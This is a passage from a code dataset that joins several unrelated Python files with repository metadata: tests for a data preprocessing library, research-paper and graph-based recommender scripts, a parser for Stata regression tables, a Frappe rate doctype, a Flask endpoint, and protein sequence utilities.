] | null | null | null | tests/test_preprocessing.py | mitchelllisle/leonard | 09f2f72d1f103813233c19950189a502868ce60a | [
"MIT"
] | 27 | 2018-04-05T22:32:11.000Z | 2018-12-09T21:04:12.000Z | tests/test_preprocessing.py | mitchelllisle/leonard | 09f2f72d1f103813233c19950189a502868ce60a | [
"MIT"
] | null | null | null | import pytest
from martha import negabs
from martha import normalise
from martha import labelEncoder
from martha import cleanUpString
from martha import medianFrequency
from martha import gini
import numpy as np
import pandas as pd
import json
from sklearn.preprocessing import LabelEncoder
# import os
# os.chdir("/Users/mitchell/Documents/projects/martha")
def test_negabs():
data = pd.read_csv("data/marvelMovies.csv")
result = data.assign(ProductionBudget = data.ProductionBudget.apply(lambda x: negabs(x)))
result = result.ProductionBudget.apply(lambda x: x < 0)
assert any(result) == True
def test_normalise():
data = pd.read_csv("data/marvelMovies.csv")
result = data.assign(score = normalise(data['ProductionBudget']))
assert 'score' in result.columns
def test_labelEncoder():
data = pd.read_csv("data/fifaAbilities.csv")
result = data.assign(preferred_foot_encoded = labelEncoder(data, "preferred_foot"))
assert result.preferred_foot_encoded.dtype == 'int64'
def test_cleanUpString():
data = "test, \n"
result = cleanUpString(data, strip_chars = [','], replace_extras = {"t" : "--"})
assert result == '--es--'
def test_medianFrequency():
data = {"values" : [1,2,4], "repeats" : [4,4,2]}
values = pd.Series(data['values'])
repeats = pd.Series(data['repeats'])
computedMedian = medianFrequency(values, repeats)
assert computedMedian == 2
def test_gini():
data = pd.read_csv("data/fifaAbilities.csv")
assert gini(data['marking']) == 0.3441157017683561
| 31.571429 | 93 | 0.716225 |
f9f1e55a1cfe8220ba10d8a734bbe623347c9690 | 7,806 | py | Python | Recommendation_System/Research_Recommender/Research_Recommender_Clustering.py | quangnguyendang/Reinforcement_Learning | 2551ce95068561c553500838ee6b976f001ba667 | [
"MIT"
] | null | null | null | Recommendation_System/Research_Recommender/Research_Recommender_Clustering.py | quangnguyendang/Reinforcement_Learning | 2551ce95068561c553500838ee6b976f001ba667 | [
"MIT"
] | null | null | null | Recommendation_System/Research_Recommender/Research_Recommender_Clustering.py | quangnguyendang/Reinforcement_Learning | 2551ce95068561c553500838ee6b976f001ba667 | [
"MIT"
] | null | null | null | # Example of CBF for research-paper domain
# Nguyen Dang Quang
from nltk.stem.snowball import SnowballStemmer
import pandas as pd
from nltk.corpus import stopwords
# --------------------------------------------------------
user_input_data = "It is known that the performance of an optimal control strategy obtained from an off-line " \
"computation is degraded under the presence of model mismatch. In order to improve the control " \
"performance, a hybrid neural network and on-line optimal control strategy are proposed in this " \
"study and demonstrated for the control of a fed-batch bioreactor for ethanol fermentation. The " \
"information of the optimal feed profile of the fed-batch reactor. The simulation results show " \
"that the neural network provides a good estimate of unmeasured variables and the on-line optimal " \
"control with the neural network estimator gives a better control performance in terms of the " \
"amount of the desired ethanol product, compared with a conventional off-line optimal control " \
"method."
user_title = "user undefined title"
# --------------------------------------------------------
metadata = pd.read_json('sample-records', lines=True)
user_data = pd.DataFrame([[user_input_data, user_title]], columns=['paperAbstract', 'title'])
metadata = pd.concat([metadata, user_data], sort=True).fillna('')
filter_na = metadata["paperAbstract"] != ''
metadata = metadata[filter_na]
# Lower the characters
def clean_data(x):
if isinstance(x, list):
list_data = []
for i in x:
list_data.append(str.lower(str(i)))
return list_data
elif isinstance(x, str):
return str.lower(str(x))
else:
return ' '
# turn list of string items into string
def get_string(x):
if isinstance(x, list):
names = ''
for i in x:
names = names + i['name'] + " "
return names
else:
return str(x)
# turn list of entity string items into string
def get_entity(x):
if isinstance(x, list):
names = ''
for i in x:
names = names + str(i) + " "
return names
else:
return str(x)
# Apply clean_data function to your features.
features = ['authors', 'title', 'journalName', 'paperAbstract']
for feature in features:
metadata[feature] = metadata[feature].apply(get_string)
metadata[feature] = metadata[feature].apply(clean_data)
metadata['entities'] = metadata['entities'].apply(get_entity)
# Create metadata soup
def create_soup(x):
return x['journalName'] + ' ' + x['title'] + ' ' + x['title'] + ' ' + x['paperAbstract'] + ' ' + x['entities'] + ' ' + x['entities'] + ' ' + x['entities']
metadata['soup'] = metadata.apply(create_soup, axis=1)
# --------------------------------------------------------
stemmer = SnowballStemmer("english")
def word_stem_and_stopword_remove(x1):
x = x1['soup']
final = ''
for y in x.split(' '):
if y not in stopwords.words('english'):
final = final + stemmer.stem(y) + ' '
return final
metadata['filtered'] = metadata.apply(word_stem_and_stopword_remove, axis=1)
# Print metadata for the first 5 films
with pd.option_context('display.max_rows', None, 'display.max_columns', 10, 'display.max_colwidth', 100):
print(metadata[['soup', 'filtered']].head(5))
print('\n\n Done Pre-processing Data \n\n')
# --------------------------------------------------------
# TfidfVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
tvec = TfidfVectorizer(min_df=1, max_df=10, stop_words='english', ngram_range=(1, 2))
tvec_weights = tvec.fit_transform(metadata.filtered.dropna())
# --------------------------------------------------------
# Classifier for User's Text - K-MEAN - http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters=24, random_state=0).fit(tvec_weights)
# print('metadata shape = ', metadata.filtered.shape)
# print('k-mean shape = ', kmeans.labels_.shape)
metadata['cluster_number_kmean'] = kmeans.labels_
# User Data and similar papers
def find_cluster_data_kmean(title):
print('\n\nSimilar papers using K-mean Clustering: \n')
filter_title = metadata['title'] == title
user_cluster = str(metadata.loc[filter_title].cluster_number_kmean.item())
similar_papers = metadata.loc[metadata['cluster_number_kmean'] == int(user_cluster)].title
with pd.option_context('display.max_rows', None, 'display.max_columns', 10, 'display.max_colwidth', -1):
print(similar_papers)
find_cluster_data_kmean(user_title)
# --------------------------------------------------------
# Classifier for User's Text - Birch - http://scikit-learn.org/stable/modules/generated/sklearn.cluster.Birch.html#sklearn.cluster.Birch
from sklearn.cluster import Birch
brc = Birch(branching_factor=50, n_clusters=24, threshold=0.5, compute_labels=True)
brc.fit(tvec_weights)
metadata['cluster_number_birch'] = brc.labels_
# User Data and similar papers
def find_cluster_data_birch(title):
print('\n\nSimilar papers using Birch Clustering: \n')
filter_title = metadata['title'] == title
user_cluster = str(metadata.loc[filter_title].cluster_number_birch.item())
similar_papers = metadata.loc[metadata['cluster_number_birch'] == int(user_cluster)].title
with pd.option_context('display.max_rows', None, 'display.max_columns', 10, 'display.max_colwidth', -1):
print(similar_papers)
find_cluster_data_birch(user_title)
# --------------------------------------------------------
# Classifier for User's Text - Agglomerative Clustering - http://scikit-learn.org/stable/modules/clustering.html#hierarchical-clustering
from sklearn.cluster import AgglomerativeClustering
# User Data and similar papers
def find_cluster_data_Agglomerative(title):
print('Similar papers using Agglomerative Clustering: \n')
filter_title = metadata['title'] == title
user_cluster = str(metadata.loc[filter_title].cluster_number_Agglomerative.item())
similar_papers = metadata.loc[metadata['cluster_number_Agglomerative'] == int(user_cluster)].title
with pd.option_context('display.max_rows', None, 'display.max_columns', 10, 'display.max_colwidth', -1):
print(similar_papers)
for linkage in ('ward', 'average', 'complete'):
clustering = AgglomerativeClustering(linkage=linkage, n_clusters=24)
clustering.fit(tvec_weights.toarray())
metadata['cluster_number_Agglomerative'] = clustering.labels_
print('\n\nAgglomerative Clustering - ', linkage)
find_cluster_data_Agglomerative(user_title)
# --------------------------------------------------
# COSINE SIMILARITY
from sklearn.metrics.pairwise import cosine_similarity
# Find the similar movie
def get_recommendations(title, cosine_sim):
# Get the index of the paper that matches to the title
idx = indices.loc[title]
# Get the pairwise similarity scores of all paper with that movie
sim_scores = list(enumerate(cosine_sim[idx]))
# Sort the papers based on the similarity scores
sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)
sim_scores = sim_scores[0:5]
# Get the paper indices
paper_indices = [i[0] for i in sim_scores]
return metadata['title'].iloc[paper_indices]
cosine_sim = cosine_similarity(tvec_weights, tvec_weights)
indices = pd.Series(metadata.index, index=metadata['title'])
print('\n\nSimilar paper using Cosine Similarity: \n')
with pd.option_context('display.max_rows', None, 'display.max_columns', 10, 'display.max_colwidth', -1):
print(get_recommendations(user_title, cosine_sim))
| 38.264706 | 158 | 0.668204 |
f9f282edbab72aad8652828b7e20e00859536805 | 5,625 | py | Python | extract_from_stata/model/regressions.py | gn0/extract-from-stata | 52f94f65d28aee257c2a46ca82149e14ab74fbda | [
"CC-BY-4.0"
] | null | null | null | extract_from_stata/model/regressions.py | gn0/extract-from-stata | 52f94f65d28aee257c2a46ca82149e14ab74fbda | [
"CC-BY-4.0"
] | null | null | null | extract_from_stata/model/regressions.py | gn0/extract-from-stata | 52f94f65d28aee257c2a46ca82149e14ab74fbda | [
"CC-BY-4.0"
] | null | null | null | import re
import collections
import extract_from_stata.model.common
def is_beginning_of_table(line):
return (line.startswith("Linear regression")
or re.match(r"^ +Source \| +SS +df +MS", line) is not None
or line.startswith("Negative binomial regression")
or line.startswith("HDFE Linear regression")
# reghdfe IV estimation:
or line.startswith("Estimates efficient for homoskedasticity only")
# margins:
or line.startswith("Average marginal effects")) # XXX
def find_first_table_in(string):
table_string = ""
for line in string.splitlines(True):
if is_beginning_of_table(line):
table_string += line
elif table_string and not line.strip():
if re.search(r"^----+$", table_string, flags=re.M):
break
else:
table_string += line
elif table_string:
table_string += line
return table_string
assert (find_first_table_in(
"foo\nbar\nLinear regression\n\n----\nfoo\nbar\n\nlipsum\n")
== "Linear regression\n\n----\nfoo\nbar\n")
def param_to_show_categoricals(parameters):
return ("show_categoricals"
in set(param for param, value in parameters))
def param_to_show_constant(parameters):
return ("show_constant"
in set(param for param, value in parameters))
def extract_sample_size(table_string):
pattern = re.compile(r"Number of obs += +([\d,]+)")
match = pattern.search(table_string)
if match is None:
return None
return match.group(1).replace(",", "")
def extract_number_of_clusters(table_string):
pattern = re.compile(r"adjusted for (\d+) clusters in")
match = pattern.search(table_string)
if match is None:
return None
return match.group(1)
def _extract_depvar_from_table_header(table_string):
pattern = re.compile(r"^ *([A-Za-z0-9_~]+) +\| +Coef[.] ")
for line in table_string.splitlines():
match = pattern.match(line)
if match is None:
continue
return match.group(1)
return None # This shouldn't be reached.
def _extract_depvar_from_table_preamble(table_string):
pattern = re.compile(r"^Expression *: +Pr\(([^)]+)\)")
for line in table_string.splitlines():
match = pattern.match(line)
if match is not None:
return match.group(1)
return None
def extract_dependent_variable(table_string):
varname = _extract_depvar_from_table_preamble(table_string)
if varname is None:
varname = _extract_depvar_from_table_header(table_string)
return varname
def extract_categorical_variable(line):
pattern = re.compile(r"^ *([A-Za-z0-9_~#.]+) +\| *$")
match = pattern.match(line)
if match is None:
return None
return match.group(1)
def is_start_of_new_block(line):
return extract_categorical_variable(line) is not None
assert is_start_of_new_block(" birth_year |")
assert not is_start_of_new_block(
" saw_protest | .0500882 .0193186")
def is_end_of_block(line):
pattern = re.compile(r"^ +\| *$")
return line.startswith("----") or pattern.match(line) is not None
def extract_coefficients(table_string, parameters):
pattern = re.compile(r"^ *([A-Za-z0-9_~#. ]+) +\| +(-?[0-9.e-]+) +([0-9.e-]+) +-?[0-9.]+ +([0-9.]+)")
coefficients = collections.OrderedDict()
segment = "pre-header"
categorical_block = False
categorical_variable = None
for line in table_string.splitlines():
if segment == "pre-header" and re.match(r"^----+$", line):
segment = "header"
elif segment == "header" and re.match(r"^----+[+]-+$", line):
segment = "post-header"
elif segment == "post-header":
if categorical_block and is_end_of_block(line):
categorical_block = False
elif is_start_of_new_block(line):
categorical_block = True
categorical_variable = extract_categorical_variable(
line)
elif (categorical_block
and not param_to_show_categoricals(parameters)):
continue
else:
match = pattern.match(line)
if match is None:
continue
elif (match.group(1) == "_cons"
and not param_to_show_constant(parameters)):
continue
if categorical_block:
variable_name = "%s.%s" % (match.group(1).strip(),
categorical_variable)
else:
variable_name = match.group(1)
coefficients[variable_name] = (
dict(coefficient=match.group(2),
std_error=match.group(3),
p_value=match.group(4)))
return coefficients
def parse_regression(block):
table_string = find_first_table_in(block)
parameters = extract_from_stata.model.common.find_parameters_in(block)
return dict(sample_size=extract_sample_size(table_string),
number_of_clusters=extract_number_of_clusters(
table_string),
dependent_variable=extract_dependent_variable(
table_string),
coefficients=extract_coefficients(
table_string, parameters),
parameters=parameters)
| 29.450262 | 105 | 0.592889 |
f9f39222109d35dd54c9520459d1d2c222c58e13 | 1,173 | py | Python | master/master/doctype/add_rate/add_rate.py | reddymeghraj/master | 1f93748fb951e52edc28c1b8c150d1acacff1687 | [
"MIT"
] | null | null | null | master/master/doctype/add_rate/add_rate.py | reddymeghraj/master | 1f93748fb951e52edc28c1b8c150d1acacff1687 | [
"MIT"
] | null | null | null | master/master/doctype/add_rate/add_rate.py | reddymeghraj/master | 1f93748fb951e52edc28c1b8c150d1acacff1687 | [
"MIT"
] | null | null | null | # Copyright (c) 2013, Wayzon and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class AddRate(Document):
def validate(self):
b=self.brand;
bt=self.brand_type;
r=self.rate;
q=frappe.db.sql("""select brand,brand_type from `tabAdd Rate` where brand=%s and brand_type=%s""",(b,bt))
if q:
q1=frappe.db.sql("""update `tabAdd Rate` set rate=%s where brand=%s and brand_type=%s""",(r,b,bt))
def before_insert(self):
b=self.brand;
bt=self.brand_type;
q=frappe.db.sql("""select brand,brand_type from `tabAdd Rate` where brand=%s and brand_type=%s""",(b,bt))
if q:
frappe.throw("Entry already exists for selected Brand,brandtype")
@frappe.whitelist()
def get_latest_purchase_rate(b,bt):
q=frappe.db.sql("""select p.date,pi.brand,pi.brand_name,pi.brand_type,pi.type_name,pi.rate
from `tabPurchaseinfo` pi,`tabPurchase` p
where p.name=pi.parent and pi.brand=%s and pi.brand_type=%s
order by date desc limit 1""",(b,bt))
if q:
r=q[0][5]
else:
frappe.msgprint("Selected Brand,brandtype are not purchased tll now")
r=0
return(r) | 35.545455 | 107 | 0.72208 |
f9f39e941eb9fa32c988e9be54fb0bea84a7c4e4 | 45 | py | Python | nautobot_plugin_nornir/tests/__init__.py | FragmentedPacket/nautobot-plugin-nornir | ef3ce9e1eb1d8e04002f0f5c3f5e34389ada20cb | [
"Apache-2.0"
] | 13 | 2021-02-28T00:21:31.000Z | 2022-03-10T13:04:50.000Z | nautobot_plugin_nornir/tests/__init__.py | rileyL6122428/nautobot-plugin-nornir | 67773960aebe4df5e6cda11f1c7e0bfd93c24fee | [
"Apache-2.0"
] | 18 | 2021-03-13T03:24:09.000Z | 2022-02-28T15:24:51.000Z | nautobot_plugin_nornir/tests/__init__.py | rileyL6122428/nautobot-plugin-nornir | 67773960aebe4df5e6cda11f1c7e0bfd93c24fee | [
"Apache-2.0"
] | 14 | 2021-03-04T03:21:16.000Z | 2021-12-20T10:20:55.000Z | """Unit tests for nautobot_plugin_nornir."""
| 22.5 | 44 | 0.755556 |
f9f6b1140ade48b9437ab03cfc7f614535b44fee | 1,267 | py | Python | oxe-api/resource/private/get_my_companies.py | CybersecurityLuxembourg/openxeco | 8d4e5578bde6a07f5d6d569b16b4de224abf7bf0 | [
"BSD-2-Clause"
] | null | null | null | oxe-api/resource/private/get_my_companies.py | CybersecurityLuxembourg/openxeco | 8d4e5578bde6a07f5d6d569b16b4de224abf7bf0 | [
"BSD-2-Clause"
] | null | null | null | oxe-api/resource/private/get_my_companies.py | CybersecurityLuxembourg/openxeco | 8d4e5578bde6a07f5d6d569b16b4de224abf7bf0 | [
"BSD-2-Clause"
] | null | null | null | from flask_apispec import MethodResource
from flask_apispec import doc
from flask_jwt_extended import jwt_required, get_jwt_identity
from flask_restful import Resource
from db.db import DB
from decorator.catch_exception import catch_exception
from decorator.log_request import log_request
from utils.serializer import Serializer
class GetMyCompanies(MethodResource, Resource):
def __init__(self, db: DB):
self.db = db
@log_request
@doc(tags=['private'],
description='Get the list of companies assigned to the user authenticated by the token',
responses={
"200": {},
})
@jwt_required
@catch_exception
def get(self):
subquery = self.db.session \
.query(self.db.tables["UserCompanyAssignment"]) \
.with_entities(self.db.tables["UserCompanyAssignment"].company_id) \
.filter(self.db.tables["UserCompanyAssignment"].user_id == get_jwt_identity()) \
.subquery()
data = Serializer.serialize(
self.db.session
.query(self.db.tables["Company"])
.filter(self.db.tables["Company"].id.in_(subquery))
.all()
, self.db.tables["Company"])
return data, "200 "
| 30.902439 | 97 | 0.649566 |
f9f91708559004c1587db8bf5fbe2a059ca12bc6 | 9,693 | py | Python | src/recommendation/main_inference.py | AntoninJoly/book | 257c641fd52d0e9499093247727b135ed361d7c4 | [
"Apache-2.0"
] | null | null | null | src/recommendation/main_inference.py | AntoninJoly/book | 257c641fd52d0e9499093247727b135ed361d7c4 | [
"Apache-2.0"
] | null | null | null | src/recommendation/main_inference.py | AntoninJoly/book | 257c641fd52d0e9499093247727b135ed361d7c4 | [
"Apache-2.0"
] | null | null | null | import math
import click
import dgl
import numpy as np
import torch
from src.builder import create_graph
from src.model import ConvModel
from src.utils_data import DataPaths, DataLoader, FixedParameters, assign_graph_features
from src.utils_inference import read_graph, fetch_uids, postprocess_recs
from src.train.run import get_embeddings
from src.metrics import get_recs, create_already_bought
from src.utils import read_data
cuda = torch.cuda.is_available()
device = torch.device('cuda') if cuda else torch.device('cpu')
num_workers = 4 if cuda else 0
def inference_ondemand(user_ids, # List or 'all'
use_saved_graph: bool,
trained_model_path: str,
use_saved_already_bought: bool,
graph_path=None,
ctm_id_path=None,
pdt_id_path=None,
already_bought_path=None,
k=10,
remove=.99,
**params,
):
"""
Given a fully trained model, return recommendations specific to each user.
Files needed to run
-------------------
Params used when training the model:
Those params will indicate how to run inference on the model. Usually, they are outputted during training
(and hyperparametrization).
If using a saved already bought dict:
The already bought dict: the dict includes all previous purchases of all user ids for which recommendations
were requested. If not using a saved dict, it will be created using the graph.
Using a saved already bought dict is not necessary, but might make the inference
process faster.
A) If using a saved graph:
The saved graph: the graph that must include all user ids for which recommendations were requested. Usually,
it is outputted during training. It could also be created by another independent function.
ID mapping: ctm_id and pdt_id mapping that allows to associate real-world information, e.g. item and customer
identifier, to actual nodes in the graph. They are usually saved when generating a graph.
B) If not using a saved graph:
The graph will be generated on demand, using all the files in DataPaths of src.utils_data. All those files will
be needed.
Parameters
----------
See click options below for details.
Returns
-------
Recommendations for all user ids.
"""
# Load & preprocess data
## Graph
if use_saved_graph:
graph = read_graph(graph_path)
ctm_id_df = read_data(ctm_id_path)
pdt_id_df = read_data(pdt_id_path)
else:
# Create graph
data_paths = DataPaths()
fixed_params = FixedParameters(num_epochs=0, start_epoch=0, # Not used (only used in training)
patience=0, edge_batch_size=0, # Not used (only used in training)
remove=remove, item_id_type=params['item_id_type'],
duplicates=params['duplicates'])
data = DataLoader(data_paths, fixed_params)
ctm_id_df = data.ctm_id
pdt_id_df = data.pdt_id
graph = create_graph(
data.graph_schema,
)
graph = assign_graph_features(graph,
fixed_params,
data,
**params,
)
## Preprocess: fetch right user ids
if user_ids[0] == 'all':
test_uids = np.arange(graph.num_nodes('user'))
else:
test_uids = fetch_uids(user_ids,
ctm_id_df)
## Remove already bought
if use_saved_already_bought:
already_bought_dict = read_data(already_bought_path)
else:
bought_eids = graph.out_edges(u=test_uids, form='eid', etype='buys')
already_bought_dict = create_already_bought(graph, bought_eids)
# Load model
dim_dict = {'user': graph.nodes['user'].data['features'].shape[1],
'item': graph.nodes['item'].data['features'].shape[1],
'out': params['out_dim'],
'hidden': params['hidden_dim']}
if 'sport' in graph.ntypes:
dim_dict['sport'] = graph.nodes['sport'].data['features'].shape[1]
trained_model = ConvModel(
graph,
params['n_layers'],
dim_dict,
params['norm'],
params['dropout'],
params['aggregator_type'],
params['pred'],
params['aggregator_hetero'],
params['embedding_layer'],
)
trained_model.load_state_dict(torch.load(trained_model_path, map_location=device))
if cuda:
trained_model = trained_model.to(device)
# Create dataloader
all_iids = np.arange(graph.num_nodes('item'))
test_node_ids = {'user': test_uids, 'item': all_iids}
n_layers = params['n_layers']
if params['embedding_layer']:
n_layers = n_layers - 1
sampler = dgl.dataloading.MultiLayerFullNeighborSampler(n_layers)
nodeloader_test = dgl.dataloading.NodeDataLoader(
graph,
test_node_ids,
sampler,
batch_size=128,
shuffle=True,
drop_last=False,
num_workers=num_workers
)
num_batches_test = math.ceil((len(test_uids) + len(all_iids)) / 128)
# Fetch recs
trained_model.eval()
with torch.no_grad():
embeddings = get_embeddings(graph,
params['out_dim'],
trained_model,
nodeloader_test,
num_batches_test,
cuda,
device,
params['embedding_layer'],
)
recs = get_recs(graph,
embeddings,
trained_model,
params['out_dim'],
k,
test_uids,
already_bought_dict,
remove_already_bought=True,
cuda=cuda,
device=device,
pred=params['pred'],
use_popularity=params['use_popularity'],
weight_popularity=params['weight_popularity']
)
# Postprocess: user & item ids
processed_recs = postprocess_recs(recs,
pdt_id_df,
ctm_id_df,
params['item_id_type'],
params['ctm_id_type'])
print(processed_recs)
return processed_recs
@click.command()
@click.option('--params_path', default='params.pkl',
help='Path where the optimal hyperparameters found in the hyperparametrization were saved.')
@click.option('--user_ids', multiple=True, default=['all'],
help="IDs of users for which to generate recommendations. Either list of user ids, or 'all'.")
@click.option('--use_saved_graph', count=True,
help='If true, will use graph that was saved on disk. Need to import ID mapping for users & items.')
@click.option('--trained_model_path', default='model.pth',
help='Path where fully trained model is saved.')
@click.option('--use_saved_already_bought', count=True,
help='If true, will use already bought dict that was saved on disk.')
@click.option('--graph_path', default='graph.bin',
help='Path where the graph was saved. Mandatory if use_saved_graph is True.')
@click.option('--ctm_id_path', default='ctm_id.pkl',
help='Path where the mapping for customer was save. Mandatory if use_saved_graph is True.')
@click.option('--pdt_id_path', default='pdt_id.pkl',
help='Path where the mapping for items was save. Mandatory if use_saved_graph is True.')
@click.option('--already_bought_path', default='already_bought.pkl',
help='Path where the already bought dict was saved. Mandatory if use_saved_already_bought is True.')
@click.option('--k', default=10,
help='Number of recs to generate for each user.')
@click.option('--remove', default=.99,
help='Percentage of users to remove from graph if used_saved_graph = True. If more than 0, user_ids might'
' not be in the graph. However, higher "remove" allows for faster inference.')
def main(params_path, user_ids, use_saved_graph, trained_model_path,
use_saved_already_bought, graph_path, ctm_id_path, pdt_id_path,
already_bought_path, k, remove):
params = read_data(params_path)
params.pop('k', None)
params.pop('remove', None)
inference_ondemand(user_ids=user_ids, # List or 'all'
use_saved_graph=use_saved_graph,
trained_model_path=trained_model_path,
use_saved_already_bought=use_saved_already_bought,
graph_path=graph_path,
ctm_id_path=ctm_id_path,
pdt_id_path=pdt_id_path,
already_bought_path=already_bought_path,
k=k,
remove=remove,
**params,
)
if __name__ == '__main__':
main()
| 42.327511 | 120 | 0.573816 |
f9fd62eb176a26c3629cfbc22be516bafd9ae4e3 | 229 | py | Python | cs585/HW1/Eval.py | tiaotiao/applets | c583a4405ed18c7d74bfba49884525c43d114398 | [
"MIT"
] | null | null | null | cs585/HW1/Eval.py | tiaotiao/applets | c583a4405ed18c7d74bfba49884525c43d114398 | [
"MIT"
] | null | null | null | cs585/HW1/Eval.py | tiaotiao/applets | c583a4405ed18c7d74bfba49884525c43d114398 | [
"MIT"
] | null | null | null | import numpy as np
class Eval:
def __init__(self, pred, gold):
self.pred = pred
self.gold = gold
def Accuracy(self):
return np.sum(np.equal(self.pred, self.gold)) / float(len(self.gold))
| 22.9 | 77 | 0.593886 |
f9ff014150d49d6aa831781d7f5630eb634ba2c0 | 5,328 | py | Python | evolutron/tools/data_tools.py | thrakar9/Evolutron | 1b9b4c364fe531e5001fd9010898b96e0f5907d7 | [
"MIT"
] | 10 | 2017-11-30T20:30:12.000Z | 2021-04-10T21:45:12.000Z | evolutron/tools/data_tools.py | thrakar9/Evolutron | 1b9b4c364fe531e5001fd9010898b96e0f5907d7 | [
"MIT"
] | null | null | null | evolutron/tools/data_tools.py | thrakar9/Evolutron | 1b9b4c364fe531e5001fd9010898b96e0f5907d7 | [
"MIT"
] | 3 | 2019-06-20T15:13:42.000Z | 2020-03-24T11:44:07.000Z | # coding=utf-8
from functools import partial
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from .seq_tools import aa2hot
from ..tools import io_tools as io
def data_it(dataset, block_size, multi_data=False):
""" Iterates through a large array, yielding chunks of block_size.
"""
size = len(dataset)
for start_idx in range(0, size, block_size):
excerpt = slice(start_idx, min(start_idx + block_size, size))
if multi_data:
yield [x[excerpt] for x in dataset]
else:
yield dataset[excerpt]
def pad_or_clip_seq(x, n):
if n >= x.shape[0]:
b = np.zeros((n, x.shape[1]))
b[:x.shape[0]] = x
return b
else:
return x[:n, :]
def pad_or_clip_img(x, n):
assert x.shape[0] == x.shape[1], 'Image should be two dimensional with equal dimensions'
if n >= x.shape[0]:
b = np.zeros((n, n))
b[:x.shape[0], :x.shape[1]] = x
return b
else:
return x[:n, :n]
def random_aa_sequence(size):
aa = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']
aa_probs = np.array([0.0825, 0.0135, 0.0545, 0.0675, 0.0385, 0.0705, 0.0225,
0.0595, 0.0585, 0.0965, 0.0245, 0.0405, 0.0475, 0.0395,
0.0555, 0.0665, 0.0535, 0.0685, 0.0105, 0.0295])
return 'M' + ''.join(np.random.choice(aa, size=size, p=aa_probs))
def load_random_aa_seqs(n, length=None, min_length=100, max_length=1000):
if length:
return pd.Series([random_aa_sequence(length) for _ in range(n)])
else:
return pd.Series([random_aa_sequence(np.random.randint(min_length, max_length)) for _ in range(n)])
def preprocess_dataset(x_data, y_data=None, one_hot='x', padded=True, pad_y_data=False, nb_aa=20, min_aa=None,
max_aa=None):
"""
Args:
x_data (pd.Series):
y_data (list or np.ndArray):
one_hot (str):
padded (bool):
pad_y_data (bool):
nb_aa:
min_aa:
max_aa:
Returns:
"""
if 'x' in one_hot:
x_data = x_data.apply(lambda x: aa2hot(x, nb_aa)).tolist()
else:
x_data = x_data.tolist()
if 'y' in one_hot:
pass
if padded:
if not max_aa:
max_aa = int(np.percentile([len(x) for x in x_data], 99)) # pad so that 99% of datapoints are complete
else:
max_aa = min(max_aa, np.max([len(x) for x in x_data]))
x_data = np.asarray([pad_or_clip_seq(x, max_aa) for x in x_data], dtype=np.float32)
if min_aa:
min_aa = max(min_aa, np.max([len(x) for x in x_data]))
x_data = np.asarray([pad_or_clip_seq(x, min_aa) for x in x_data], dtype=np.float32)
if y_data:
if padded and pad_y_data:
y_data = np.asarray([pad_or_clip_seq(y, min_aa) for y in y_data])
else:
y_data = np.asarray(y_data)
assert ((len(x_data) == len(y_data)) or (len(x_data) == len(y_data[0])))
data_size = len(x_data)
print('Dataset size: {0}'.format(data_size))
return x_data, y_data
else:
data_size = len(x_data)
print('Dataset size: {0}'.format(data_size))
return x_data
def load_dataset(infile, codes=None, code_key=None, nb_aa=20, **parser_options):
"""
Loads the Evolutron formatted dataset from the input file. Automatically recognizes file format and calls
corresponding parser.
Args:
infile:
codes:
code_key:
nb_aa:
**parser_options:
Returns: The dataset with the appropriate format given the options.
"""
filename = infile
filetype = filename.split('.')[-1]
if filetype == 'tsv':
x_data, y_data = io.csv_parser(filename, codes, code_key, sep='\t')
elif filetype == 'csv':
x_data, y_data = io.csv_parser(filename, codes, code_key, sep=',')
elif filetype == 'fasta':
x_data, y_data = io.fasta_parser(filename, codes, code_key)
elif filetype == 'sec':
x_data, y_data = io.secs_parser(filename, nb_aa=nb_aa, **parser_options)
elif filetype == 'gz':
x_data, y_data = io.npz_parser(filename, nb_aa=nb_aa, **parser_options)
elif filetype == 'h5':
x_data, y_data = io.h5_parser(filename, **parser_options)
else:
raise NotImplementedError('There is no parser for current file type.')
return x_data, y_data
def train_valid_split(x, y, nb_inputs=1, nb_outputs=1, validation_split=0.0, stratify=None, shuffle=True):
seed = np.random.randint(0, 10)
split_func = partial(train_test_split, test_size=validation_split, stratify=stratify, shuffle=shuffle,
random_state=seed)
if nb_inputs == 1:
x_train, x_valid = split_func(x)
else:
x_train = [[] for _ in x]
x_valid = [[] for _ in x]
for i, x_d in enumerate(x):
x_train[i], x_valid[i] = split_func(x_d)
if nb_outputs == 1:
y_train, y_valid = split_func(y)
else:
y_train = [[] for _ in y]
y_valid = [[] for _ in y]
for i, y_d in enumerate(y):
y_train[i], y_valid[i] = split_func(y_d)
return x_train, y_train, x_valid, y_valid
| 31.714286 | 115 | 0.593844 |
f9ff05579682158568bfec5a2b8abe73eaf5622f | 1,894 | py | Python | magic_timer/format_seconds.py | sradc/magic-timer | 02e95ae7e96787871bd243a2a6a3e14d8615560e | [
"MIT"
] | 2 | 2020-09-10T15:43:28.000Z | 2020-09-11T08:14:36.000Z | magic_timer/format_seconds.py | sradc/magic-timer | 02e95ae7e96787871bd243a2a6a3e14d8615560e | [
"MIT"
] | 1 | 2020-09-10T10:55:04.000Z | 2020-09-10T12:40:15.000Z | magic_timer/format_seconds.py | sradc/magic-timer | 02e95ae7e96787871bd243a2a6a3e14d8615560e | [
"MIT"
] | 1 | 2020-03-06T09:07:54.000Z | 2020-03-06T09:07:54.000Z | """Turn time in seconds into a readable string.
"""
import math
from typing import Union, Tuple
TIME_UNITS = ( # Order matters
("days", 24 * 60 * 60),
("hours", 60 * 60),
("minutes", 60),
("seconds", 1),
("milliseconds", 1 / 1000),
("microseconds", 1 / 1000_000),
)
def format_seconds(seconds: float) -> str:
"""Convert `seconds` into readable string.
E.g. format_seconds(45.38) -> '46 seconds'
format_seconds(434) -> '7.3 minutes'
"""
try:
value, unit = _convert_to_appropriate_unit(seconds)
except ValueError:
return f"t < 1 {TIME_UNITS[-1][0]}"
value = _round_appropriately(value, unit)
return f"{value} {unit}"
def _convert_to_appropriate_unit(value_in_seconds: float) -> Tuple[float, str]:
"""Convert `value_in_seconds` into an appropriate unit from TIME_UNITS."""
for unit, seconds_in_unit in TIME_UNITS:
